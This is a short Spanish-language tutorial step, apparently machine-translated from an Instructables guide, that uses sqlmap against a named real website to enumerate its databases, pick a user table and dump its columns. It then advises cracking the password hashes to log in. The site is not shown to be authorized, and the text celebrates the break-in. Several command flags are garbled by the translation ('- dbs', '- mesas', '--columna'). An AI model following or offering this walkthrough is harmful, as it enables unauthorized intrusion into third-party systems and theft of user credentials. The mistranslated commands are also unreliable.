Paso 4: Usando sqlmap para hackearlo
En el tipo de terminal:
SqlMap -u http://www.angelvestgroup.com/info.php?id=1 - dbs
(http://www.angelvestgroup.com/info.php?id=1 es mi url vulnerable)
Ahora se va a cargar las bases de datos...
Si hecho esto usted necesitará seleccionar una base de datos escribiendo:
SqlMap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china - mesas
(angelvest_china es la base de datos que he encontrado)
Ahora se va a cargar toda la información que está en la base de datos seleccionada.
Ahora usted necesitará seleccionar una tabla escribiendo:
SqlMap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user--columna
(db_user es la tabla que encontré)
Ahora debes seleccionar una columna escribiendo:
SqlMap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user - C nombre de usuario: descarga
(nombre de usuario es el nombre de la columna que encontré)
Ahora descargará la información en la columna Nombre de usuario y: has hackeado! (En ese sitio hay una columna llamada contraseñas demasiado por lo que sólo necesitará descifrar hashes en esa columna y boom! Usted puede iniciar sesión.)
¡ Felicidades! Sólo has hackeado un sitio web con sqlmap! Si te gustó el instructable que debería echar un vistazo a mi instructables otros también! Estad atentos para más!